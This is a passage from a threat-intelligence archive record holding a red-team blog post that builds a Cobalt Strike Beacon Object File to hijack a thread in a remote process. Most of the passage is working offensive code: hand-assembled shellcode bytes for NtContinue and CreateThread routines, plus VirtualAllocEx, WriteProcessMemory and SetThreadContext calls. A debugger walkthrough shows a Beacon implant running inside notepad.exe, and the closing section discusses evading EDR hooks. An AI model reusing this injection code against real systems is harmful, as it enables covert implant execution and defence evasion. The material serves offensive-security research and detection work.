current calling thread, which will be in the remote process. This\r\nmeans we will need to embed the CONTEXT record into our final payload that will be injected into the remote\r\nprocess. Additionally, since NtContinue restores execution of the calling thread, this is why we need to embed an\r\nNtContinue shellcode into the final payload that will be placed into the remote process. That way, when the\r\nhijacked thread executes the NtContinue routine, restoration of the hijacked thread will occur, since it is the\r\ncalling thread. With that said, let’s get into developing the routine.\r\nSynonymous with our CreateThread routine, let’s create a 64-byte buffer and a new counter.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 18 of 37\n\nBYTE ntContinue[64] = { NULL };\r\nint i = 0;\r\nAs mentioned earlier, this NtContinue routine is going to be the piece of code that actually invokes the\r\nCreateThread routine. When this NtContinue routine performs the call to the CreateThread routine, it will\r\npush a return address on the stack, which will be the next instruction within this NtContinue shellcode. When the\r\nCreateThread shellcode performs its return, execution will pick back up inside of the NtContinue shellcode.\r\nWith this in mind, let’s start by using a near call, which uses relative addressing, to call the CreateThread\r\nshellcode.\r\nThe first goal is to start off the NtContinue routine with a call to the CreateThread routine. To do this, we first\r\nneed to calculate the distance from this call instruction to the location of the CreateThread shellcode. In order to\r\nproperly do this, we need to take one thing into consideration, and that is we need to also carry the preserved\r\nCONTEXT record with us, for use, in the NtContinue call. To do this, we will use a near call procedure. Near\r\ncalls, in assembly, do not call an absolute address, like the address of a Windows API function, for instance.\r\nInstead, near call instructions can be used to call a function, relative to the address in the instruction pointer.\r\nEssentially, if we can calculate the distance, in a DWORD , to the CreateThread routine, we can just invoke the\r\nopcode 0xe8 , along with a DWORD to represent the distance from the current memory location, in order to\r\ndynamically call the CreateThread routine! The reason we are using a DWORD , which is a 32-bit value, is\r\nbecause the x86 instruction set, which is usable by 64-bit systems, allows either a 16-bit or 32-bit relative virtual\r\naddress (RVA). However, this 32-bit value is sign extended to a 64-bit value on 64-bit systems. More information\r\non the different calling mechanisms on x86_64 systems can be found here. The offset to our shellcode will be the\r\nsize of our NtContinue routine plus the size of a CONTEXT record. This essentially will “jump over” the\r\nNtContinue code and the CONTEXT record, in order to first execute the CreatThread routine. The\r\ncorresponding instructions we need, are as follows.\r\n// First calculate the size of a CONTEXT record and NtContinue routine\r\n// Then, \"jump over shellcode\" by calling the buffer at an offset of the calculation (64 bytes + CONTEXT size)\r\n// 0xe8 is a near call, which uses RIP as the base address for RVA calculations and dynamically adds the offset\r\nntContinue[i++] = 0xe8;\r\n// Subtracting to compensate for the near call opcode (represented by i) and the DWORD used for relative address\r\nDWORD shellcodeOffset = sizeof(ntContinue) + sizeof(CONTEXT) - sizeof(DWORD) - i;\r\nmycopy(ntContinue + i, \u0026shellcodeOffset, sizeof(shellcodeOffset));\r\n// Update counter with location buffer can be written to\r\ni += sizeof(shellcodeOffset);\r\nAlthough the above code practically represents what was said about, you can see that the size of a DWORD and the\r\nvalue of i are subtracted from the offset previously mentioned. This is because, the whole NtContinue routine\r\nis 64 bytes. By the time the code has finished executing the entire call instruction, a few things will have\r\nhappened. The first being, the call instruction itself, 0xe8 , will have been executed. This takes us from being at\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 19 of 37\n\nthe beginning of our routine, byte 1/64, to the second byte in our routine, byte 2/64. The CreateThread routine,\r\nwhich we need to call, is now one byte closer than when we started - and this will affect our calculations. In the\r\nabove set of instructions, this byte has been compensated for, by subtracting the already executed opcode (the\r\ncurrent value of i ). Additionally, four bytes are taken up by the actual offset itself, a DWORD , which is a 4 byte\r\nvalue. This means execution will now be at byte 5/64 (one byte for the opcode and four bytes for the DWORD ). To\r\ncompensate for this, the size of a DWORD has been subtracted from the total offset. If you think about it, this\r\nmakes sense. By the time the call has finished executing, the CreateThread routine will be five bytes closer. If\r\nwe used the original offset, we would have overshot the CreateThread routine by five bytes. Additionally, we\r\nupdate the i counter variable to let it know how many bytes we have written to the overall NtContinue routine.\r\nWe will walk through all of these instructions inside of the debugger, once we have finished developing this small\r\nshellcode routine.\r\nAt this point, the NtContinue routine would have called the CreateThread routine. The CreateThread routine\r\nwould have returned execution back to the NtContinue routine, and the next instructions in the NtContinue\r\nroutine would execute.\r\nThe next few instructions are a bit of a “hacky” method to pass the first parameter, a pointer to our CONTEXT\r\nrecord, to the NtContinue function. We will use a call/pop routine, which is a very documented method and\r\ncan be read about here and here. As we know, we are required to place the first value, for our purposes, into the\r\nRCX register - per the __fastcall calling convention. This means we need to calculate the address of the\r\nCONTEXT record somehow. To do this, we actually use another near call instruction in order to call the immediate\r\nbyte after the call instruction.\r\n// Near call instruction to call the address directly after, which is used to pop the pushed return address ont\r\nntContinue[i++] = 0xe8;\r\nntContinue[i++] = 0x00;\r\nntContinue[i++] = 0x00;\r\nntContinue[i++] = 0x00;\r\nntContinue[i++] = 0x00;\r\nThe instruction this call will execute is the immediate next instruction to be executed, which will be a pop\r\nrcx instruction added by us. Additionally the value of i at this point is saved into a new variable called\r\ncontextOffset .\r\n// The previous call instruction pushes a return address onto the stack\r\n// The return address will be the address, in memory, of the upcoming pop rcx instruction\r\n// Since current execution is no longer at the beginning of the ntContinue routine, the distance to the CONTEXT\r\n// The address of the pop rcx instruction will be used as the base for RVA calculations to determine the distanc\r\n// Obtaining the current amount of bytes executed thus far\r\nint contextOffset = i;\r\n// __fastcall calling convention\r\n// NtContinue requires a pointer to a context record and an alert state (FALSE in this case)\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 20 of 37\n\n// pop rcx (get return address, which isn't needed for anything, into RCX for RVA calculations)\r\nntContinue[i++] = 0x59;\r\nThe purpose of this, is the call instruction will push the address of the pop rcx instruction onto the stack. This\r\nis the return address of this function. Since the next instruction directly after the call is pop rcx , it will place\r\nthe value at RSP, which is now the address of the pop rcx instruction due to call POP_RCX_INSTRUCTION\r\npushing it onto the stack, into the RCX register. This helps us, as now we have a memory address that is relatively\r\nclose the the CONTEXT record, which will be located directly after the call to NtContinue .\r\nNow, as we know, the original offset of the CONTEXT record from the very beginning of the entire NtContinue\r\nroutine was 64-bytes. This is because we will copy the CONTEXT record directly after the 64-byte BYTE array,\r\nntContinue , in our final buffer. Right now however, if we add 64-bytes, however, to the value in RCX, we will\r\novershoot the CONTEXT record’s address. This is because we have executed quite a few instructions of the 64-byte\r\nshellcode, meaning we are now closer to the CONTEXT record, than we where when we started. To compensate for\r\nthis, we can add the original 64-byte offset to the RCX register, and then subtract the contextOffset value,\r\nwhich represents the total amount of opcodes executed up until that point. This will give us the correct distance\r\nfrom our current location to the CONTEXT record.\r\n// The address of the pop rcx instruction is now in RCX\r\n// Adding the distance between the CONTEXT record and the current address in RCX\r\n// add rcx, distance to CONTEXT record\r\nntContinue[i++] = 0x48;\r\nntContinue[i++] = 0x83;\r\nntContinue[i++] = 0xc1;\r\n// Value to be added to RCX\r\n// The distance between the value in RCX (address of the 'pop rcx' instruction) and the CONTEXT record can be fo\r\nntContinue[i++] = sizeof(ntContinue) - contextOffset;\r\nThis will place the address of the CONTEXT record into the RCX register. If this doesn’t compute, don’t worry. In\r\na brief moment, we will step through everything inside of WinDbg to visually put things together.\r\nThe next goal is to set the RaiseAlert function argument to FALSE , which is a value of 0. To do this, again, we\r\nwill use bitwise XOR.\r\n// xor rdx, rdx\r\n// Set to FALSE\r\nntContinue[i++] = 0x48;\r\nntContinue[i++] = 0x31;\r\nntContinue[i++] = 0xd2;\r\nAll that is left now is to call NtContinue ! Again, just like our call to CreateThread , we can resolve the address\r\nof the API inside of the current process and pass the return value to the remote process, as even though each\r\nprocess is mapped its own Windows DLLs, the addresses are the same across the system.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 21 of 37\n\nThe mov rax instruction set is first.\r\n// Place NtContinue into RAX\r\nntContinue[i++] = 0x48;\r\nntContinue[i++] = 0xb8;\r\nWe then resolve the address of NtContinue , Beacon Object File style.\r\n// Although the thread is in a remote process, the Windows DLLs mapped to the Beacon process, although private,\r\nunsigned long long ntcontinueAddress = KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA(\"ntdll\"), \"NtContinue\")\r\n// Error handling. If NtContinue cannot be resolved, abort\r\nif (ntcontinueAddress == NULL)\r\n{\r\n BeaconPrintf(CALLBACK_ERROR, \"Error! Unable to resolve NtContinue.\\n\", KERNEL32$GetLastError());\r\n}\r\nUsing the custom mycopy function, we then can copy the address of NtContinue at the correct index within the\r\nBYTE array, based on the value of i .\r\n// Copy the address of NtContinue function address to the NtContinue routine buffer\r\nmycopy(ntContinue + i, \u0026ntcontinueAddress, sizeof(ntcontinueAddress));\r\n// Update the counter with the correct offset the next bytes should be written to\r\ni += sizeof(ntcontinueAddress);\r\nAt this point, things are as easy as just allocating some stack space for good measure and calling the value in\r\nRAX, NtContinue !\r\n// Allocate some space on the stack for the call to NtContinue\r\n// sub rsp, 0x20\r\nntContinue[i++] = 0x48;\r\nntContinue[i++] = 0x83;\r\nntContinue[i++] = 0xec;\r\nntContinue[i++] = 0x20;\r\n// call NtContinue\r\nntContinue[i++] = 0xff;\r\nntContinue[i++] = 0xd0;\r\nAll there is left now is the stack alignment routine inside of the call to CreateThread ! This alignment is to ensure\r\nthe stack pointer is 16-byte aligned when the call from the NtContinue routine invokes the CreateThread\r\nroutine.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 22 of 37\n\nWill The Stars Align?\r\nThe following routine will perform bitwise AND with the stack pointer, to ensure a 16-byte aligned RSP value\r\ninside of the CreateThread routine, by clearing out the last 4 bits of the address.\r\n// Create 4 byte buffer to perform bitwise AND with RSP to ensure 16-byte aligned stack for the call to shellco\r\n// and rsp, 0FFFFFFFFFFFFFFF0\r\nstackAlignment[0] = 0x48;\r\nstackAlignment[1] = 0x83;\r\nstackAlignment[2] = 0xe4;\r\nstackAlignment[3] = 0xf0;\r\nAfter the stack alignment is completed, all there is left to do is invoke malloc to create a large buffer that will\r\ncontain all of our custom routines, inject the final buffer, and call SetThreadContext and ResumeThread to\r\nqueue execution!\r\n// Allocating memory for final buffer\r\n// Size of NtContinue routine, CONTEXT structure, stack alignment routine, and CreateThread routine\r\nPVOID shellcodeFinal = (PVOID)MSVCRT$malloc(sizeof(ntContinue) + sizeof(CONTEXT) + sizeof(stackAlignment) + size\r\n// Copy NtContinue routine to final buffer\r\nmycopy(shellcodeFinal, ntContinue, sizeof(ntContinue));\r\n// Copying CONTEXT structure, stack alignment routine, and CreateThread routine to the final buffer\r\n// Allocation is already a pointer (PVOID) - casting to a DWORD64 type, a 64-bit address, in order to write to t\r\n// Using RtlMoveMemory for the CONTEXT structure to avoid casting to something other than a CONTEXT structure\r\nNTDLL$RtlMoveMemory((DWORD64)shellcodeFinal + sizeof(ntContinue), \u0026cpuRegisters, sizeof(CONTEXT));\r\nmycopy((DWORD64)shellcodeFinal + sizeof(ntContinue) + sizeof(CONTEXT), stackAlignment, sizeof(stackAlignment));\r\nmycopy((DWORD64)shellcodeFinal + sizeof(ntContinue) + sizeof(CONTEXT) + sizeof(stackAlignment), createThread, si\r\n// Declare a variable to represent the final length\r\nint finalLength = (int)sizeof(ntContinue) + (int)sizeof(CONTEXT) + sizeof(stackAlignment) + sizeof(createThread)\r\nBefore moving on, notice the call to RtlMoveMemory when it comes to copying the CONTEXT record to the buffer.\r\nThis is due to mycopy being prototyped to access the source and destination buffers as char* data types.\r\nHowever, RtlMoveMemory is prototyped to accept data types of VOID UNALIGNED , which indicates pretty much\r\nany data type can be used, which is perfect for us as CONTEXT is a structure, not a char* .\r\nThe above code creates a buffer with the size of our routines, and copies it into the routine at the correct offsets,\r\nwith the NtContinue routine being copied first, followed by the preserved CONTEXT record of the hijacked\r\nthread, the stack alignment routine, and the CreateThread routine. After this, the shellcode is injected into the\r\nremote process.\r\nFirst, VirtualAllocEx is called again.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 23 of 37\n\n// Inject the shellcode into the target process with read/write permissions\r\nPVOID allocateMemory = KERNEL32$VirtualAllocEx(\r\n processHandle,\r\n NULL,\r\n finalLength,\r\n MEM_RESERVE | MEM_COMMIT,\r\n PAGE_EXECUTE_READWRITE\r\n);\r\nif (allocateMemory == NULL)\r\n{\r\n BeaconPrintf(CALLBACK_ERROR, \"Error! Unable to allocate memory in the remote process. Error: 0x%lx\\n\", KERNEL3\r\n}\r\nSecondly, WriteProcessMemory is called to write the shellcode to the allocation.\r\n// Write shellcode to the new allocation\r\nBOOL writeMemory = KERNEL32$WriteProcessMemory(\r\n processHandle,\r\n allocateMemory,\r\n shellcodeFinal,\r\n finalLength,\r\n NULL\r\n);\r\nif (!writeMemory)\r\n{\r\n BeaconPrintf(CALLBACK_ERROR, \"Error! Unable to write memory to the buffer. Error: 0x%llx\\n\", KERNEL32$GetLastE\r\n}\r\nAfter that, RSP and RIP are set before the call to SetThreadContext . RIP will point to our final buffer and upon\r\nthread restoration, the value in RIP will be executed.\r\n// Allocate stack space by subtracting the stack by 0x2000 bytes\r\ncpuRegisters.Rsp -= 0x2000;\r\n// Change RIP to point to our shellcode and typecast buffer to a DWORD64 because that is what a CONTEXT structur\r\ncpuRegisters.Rip = (DWORD64)allocateMemory;\r\nNotice that RSP is subtracted by 0x2000 bytes. @zerosum0x0’s blog post on ThreadContinue adopts this\r\nfeature, to allow breathing room on the stack in order for code to execute, and I decided to adopt it as well in order\r\nto avoid heavy troubleshooting.\r\nAfter that, all there is left to do is to invoke SetThreadContext , ResumeThread , and free !\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 24 of 37\n\nSetThreadContext\r\n// Set RIP\r\nBOOL setRip = KERNEL32$SetThreadContext(\r\n desiredThread,\r\n \u0026cpuRegisters\r\n);\r\n// Error handling\r\nif (!setRip)\r\n{\r\n BeaconPrintf(CALLBACK_ERROR, \"Error! Unable to set the target thread's RIP register. Error: 0x%lx\\n\", KERNEL32\r\n}\r\nResumeThread\r\n// Call to ResumeThread()\r\nDWORD resume = KERNEL32$ResumeThread(\r\n desiredThread\r\n);\r\nfree\r\n// Free the buffer used for the whole payload\r\nMSVCRT$free(\r\n shellcodeFinal\r\n);\r\nAdditionally, you should always clean up handles in your code - but especially in Beacon Object Files, as they are\r\n“sensitive”.\r\n// Close handle\r\nKERNEL32$CloseHandle(\r\n desiredThread\r\n);\r\n// Close handle\r\nKERNEL32$CloseHandle(\r\nprocessHandle\r\n);\r\nDebugger Time\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 25 of 37\n\nLet’s use an instance of notepad.exe as our target process and attach it in WinDbg.\r\nThe PID we want to inject into is 7548 for our purposes. After loading our Aggressor Script developed earlier,\r\nwe can use the command cThreadHijack 7548 TESTING , where TESTING is the name of the HTTP listener\r\nBeacon will interact with.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 26 of 37\n\nThere we go, our BOF successfully ran. Now, let’s examine what we are working with in WinDbg. As we can see,\r\nthe address of our final buffer is shown in the Current RIP: 0x1f027f20000 output line. Let’s view this in\r\nWinDbg.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 27 of 37\n\nGreat! Everything seems to be in place. As is shown in the mov rax,offset ntdll!NtContinue instruction, we\r\ncan see our NtContinue routine. The beginning of the NtContinue routine should call the address of the stack\r\nalignment and CreateThread shellcode, as mentioned earlier in this blog post. Let’s see what the address\r\n0x000001f027f20510 references, which is the memory address being called.\r\nPerfect! As we can see by the and rsp, 0FFFFFFFFFFFFFFFF0 instruction, along with the address of\r\nKERNEL32!CreateThreadStub , the NtContinue routine will first call the stack alignment and CreateThread\r\nroutines. In this case, we are good to go! Let’s start now walking through execution of the code.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 28 of 37\n\nUpon SetThreadContext being invoked, which changes the RIP register to execute our shellcode, we can see that\r\nexecution has reached the first call , which will invoke the stack alignment and CreateThread routines.\r\nStepping through this call, as we know, will push a return address onto the stack. As mentioned previously, this\r\nwill be the address of that next call 0x000001f027f2000a instruction. When the CreateThread routine returns,\r\nit will return to this address. After stepping through the instruction, we can see that the address of the next call\r\nis pushed onto the stack.\r\nExecution then reaches the bitwise AND instruction. As we can see from the above image, and rsp,\r\n0FFFFFFFFFFFFFFF0 is redundant, as the stack pointer is already 16-byte aligned (the last 4 bits are already set to\r\n0). Stepping through the bitwise XOR operations, RCX and RDX are set to 0.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 29 of 37\n\nAs we know from the CreateThread prototype, the lpStartAddress parameter is a pointer to our shellcode.\r\nLooking at the above image, we can see the third argument, which will be loaded into R8, is 0x1f027ee0000 .\r\nUnassembling this address in the debugger discloses this is our Beacon implant, which was injected earlier! TO\r\nverify this, you can generate a raw Beacon stageless artifact in Cobalt Strike manually and run it through\r\nhexdump to verify the first few opcodes correspond.\r\nAfter stepping through the instruction, the value is loaded into the R8 register. The next instruction sets R9 to 0 via\r\nxor r9, r9 .\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 30 of 37\n\nAdditionally, [RSP + 0x20] and [RSP + 0x28] are set to 0, by copying the value of R9, which is now 0, to these\r\nlocations. Here is what [RSP + 0x20] and [RSP + 0x28] look like before the mov [rsp + 0x20], r9 and mov\r\n[rsp + 0x28], r9 instructions and after.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 31 of 37\n\nAfter, CreateThread is placed into RAX and is called. Note CreateThread is actually CreateThreadStub . This\r\nis because most former kernel32.dll functions were placed in a DLL called KERNELBASE.DLL . These “stub”\r\nfunctions essentially just redirect execution to the correct KERNELBASE.dll function.\r\nStepping over the function, with p in WinDbg, places the CreateThread return value, into RAX - which is a\r\nhandle to the local thread containing the Beacon implant.\r\nAfter execution of our NtContinue routine is complete, we will receive the Beacon callback as a result of this\r\nthread.\r\nAdditionally, we can see that RSP is set to the first “real” instruction of our NtContinue routine. A ret\r\ninstruction, which is what is in RIP currently, will take the stack pointer (RSP) and place it into RIP. Executing the\r\nreturn redirects execution back to the NtContinue routine.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 32 of 37\n\nAs we can see in the image above, the next call instruction calls the pop rcx instruction. This call\r\ninstruction, when executed, will push the address of the pop rcx instruction onto the stack, as a return address.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 33 of 37\n\nExecuting the pop rcx instruction, we can see that RCX now contains the address, in memory, of the pop rcx\r\ninstruction. This will be the base address used in the RVA calculations to resolve the address of the preserved\r\nCONTEXT record.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 34 of 37\n\nTo verify if our offset is correct, we can use .cxr in WinDbg to divulge if the contiguous memory block located\r\nat RCX + 0x36 is in fact a CONTEXT record. 0x36 is chosen, as this is the value currently that is about to be\r\nadded to RCX, as seen a few screenshots ago. Verifying with WinDbg, we can see this is the case.\r\nIf this would not have been the correct location of the CONTEXT record, this WinDbg extension would have failed,\r\nas the memory block would not have been parsed correctly.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 35 of 37\n\nNow that we have verified our CONTEXT record is in the correct place, we can perform the RVA calculation to add\r\nthe correct distance to the CONTEXT record, meaning the pointer is then stored in RCX, fulfilling the PCONTEXT\r\nparameter of NtContinue .\r\nStepping through xor rdx, rdx , which sets the RaiseAlert parameter of NtContinue to FALSE , execution\r\nlands on the call rax instruction, which will call NtContinue .\r\nPressing g in the debugger then shows us quite a few of DLLs are mapped into notepad.exe .\r\nThis is the Beacon implant resolving needed DLLs for various function calls - meaning our Beacon implant has\r\nbeen executed! If we go back into Cobalt Strike, we can see we now have a Beacon in context of notepad.exe\r\nwith the same PID of 7548!\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 36 of 37\n\nAdditionally, you will notice on the victim machine that notepad.exe is fully functional! We have successfully\r\nforced a remote thread to execute our payload and restored it, all in one go.\r\nFinal Thoughts\r\nObviously, this technique isn’t without its flaws. There are still IOCs for this technique, including invoking\r\nSetThreadContext , amongst other things. However, this does avoid invoking any sort of action that creates a\r\nremote thread, which is still useful in most situations. This technique could be taken further, perhaps with\r\ninvoking direct system calls versus invoking these APIs, which are susceptible to hooking, with most EDR\r\nproducts.\r\nAdditionally, one thing to note is that since this technique suspends a thread and then resumes it, you may have to\r\nwait a few moments to even a few minutes, in order for the thread to get around to executing. Interacting with the\r\nprocess directly will force execution, but targeting Windows processes that perform execution often is a good\r\ntarget also to avoid long waits.\r\nI had a lot of fun implementing this technique into a BOF and I am really glad I have a reason to write more C\r\ncode! Like always: peace, love, and positivity :-).\r\nSource: https://connormcgarr.github.io/thread-hijacking/\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 37 of 37\n\n  https://connormcgarr.github.io/thread-hijacking/    \nThere we go, our BOF successfully ran. Now, let’s examine what we are working with in WinDbg. As we can see,\nthe address of our final buffer is shown in the Current RIP: 0x1f027f20000 output line. Let’s view this in\nWinDbg.      \n   Page 27 of 37   \n\n  https://connormcgarr.github.io/thread-hijacking/    \nAs we can see in the image above, the next call instruction calls the pop rcx instruction. This call\ninstruction, when executed, will push the address of the pop rcx instruction onto the stack, as a return address.\n   Page 33 of 37  \n\n  https://connormcgarr.github.io/thread-hijacking/    \nExecuting the pop rcx instruction, we can see that RCX now contains the address, in memory, of the pop rcx\ninstruction. This will be the base address used in the RVA calculations to resolve the address of the preserved\nCONTEXT record.      \n   Page 34 of 37",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://connormcgarr.github.io/thread-hijacking/"
	],
	"report_names": [
		"thread-hijacking"
	],
	"threat_actors": [],
	"ts_created_at": 1775791323,
	"ts_updated_at": 1775791339,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/22a337a7e2a698b3935b38a27b5fe1eeac6b1f7f.pdf",
		"text": "https://archive.orkl.eu/22a337a7e2a698b3935b38a27b5fe1eeac6b1f7f.txt",
		"img": "https://archive.orkl.eu/22a337a7e2a698b3935b38a27b5fe1eeac6b1f7f.jpg"
	}
}